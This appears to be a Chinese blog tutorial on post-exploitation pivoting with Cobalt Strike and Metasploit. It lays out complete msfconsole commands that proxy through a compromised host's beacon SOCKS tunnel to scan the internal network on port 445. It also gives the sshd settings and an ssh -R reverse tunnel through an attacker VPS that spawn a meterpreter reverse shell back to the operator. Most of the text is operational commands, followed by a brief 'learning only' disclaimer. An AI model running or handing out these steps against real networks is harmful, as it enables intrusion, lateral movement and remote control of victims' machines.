0x01 概述

通过beacon内置的socks功能将本地msf直接代入目标内网借助CobaltStrike的外部tcp监听器通过ssh隧道直接派生一个meterpreter到本地

0x02 通过beacon内置的socks功能将本地msf直接代入目标内网进行操作

  • 首先,到已控目标内网机器的beacon shell下把socks开起来
cs开启socks
  • 接着,点开cs菜单找到 “Proxy Pivots” 复制生成的msf代理链接
Proxy Pivots
msf代理指令
  • 本地启动msf,挂着上面生成的代理链接
msf5 > setg Proxies socks4:106.12.61.107:8989    //让本地的msf走上面cs的socks代理
Proxies => socks4:106.12.61.107:8989
msf5 > setg ReverseAllowProxy true                          //建双向通道
ReverseAllowProxy => true
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.64.1/24       //设置扫描的网段
RHOSTS => 192.168.64.1/24
msf5 auxiliary(scanner/portscan/tcp) > set PORTS 445                 //设置端口
PORTS => 445
msf5 auxiliary(scanner/portscan/tcp) > set threads 30                 //设置线程数
threads => 30
msf5 auxiliary(scanner/portscan/tcp) > run                              //执行
扫描内网下的445端口

0x03 尝试借助CobaltStrike的外部tcp监听器通过ssh隧道直接派生一个meterpreter 的 shell 到本地

  • 先在cs上创建一个tcp的外部监听器,回连端口设为8888
开启外部监听端口为8888
  • 到本地机器把msf起起来,并创建如下监听器
msf5 auxiliary(scanner/portscan/tcp) > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp      //注:此处的协议格式务必要和上面cs外部监听器的协议对应,不然meter是无法正常回连置
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.40.121
LHOST => 192.168.40.121
msf5 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf5 exploit(multi/handler) > run
msf开启监听
  • 随后,回到自己的vps机器上编辑sshd配置,开启ssh转发功能,重启ssh服务,这是所有使用ssh隧道转发前的必备操作
# vi/etc/ssh/sshd_config  
AllowTcpForwarding yes 
 GatewayPorts yes  
TCPKeepAlive yes  
PasswordAuthentication yes
# systemctl restartsshd.service
  • 回到自己本地的linux中并通过ssh隧道做好如下转发,意思就是通过vps 这台机器把来自外部的8888端口流量全部转到我本地192.168.40.121的6666端口上,而本地192.168.40.121的6666端口上跑的又正好是meter的监听器,所以,最终才会造成meterpreter本地上线的效果
$ sudo ssh -C -f -N -g -R 0.0.0.0:8888:192.168.40.121:6666 [email protected]的ip -p 22
ssh代理转发

注:监听的端口不能和vps机器上的现有端口冲突,否则隧道是建不成功的

  • 回到cs上选择目标内网指定机器的beacon shell 点击 “Spawn” 派生,再选择刚在上面创建好的tcp的外部监听器,相应目标机器的meterpreter就会被直接弹到本地
cs选择派生监听payload
本地回弹meterpreter

注:文章仅用于交流学习使用!

发表评论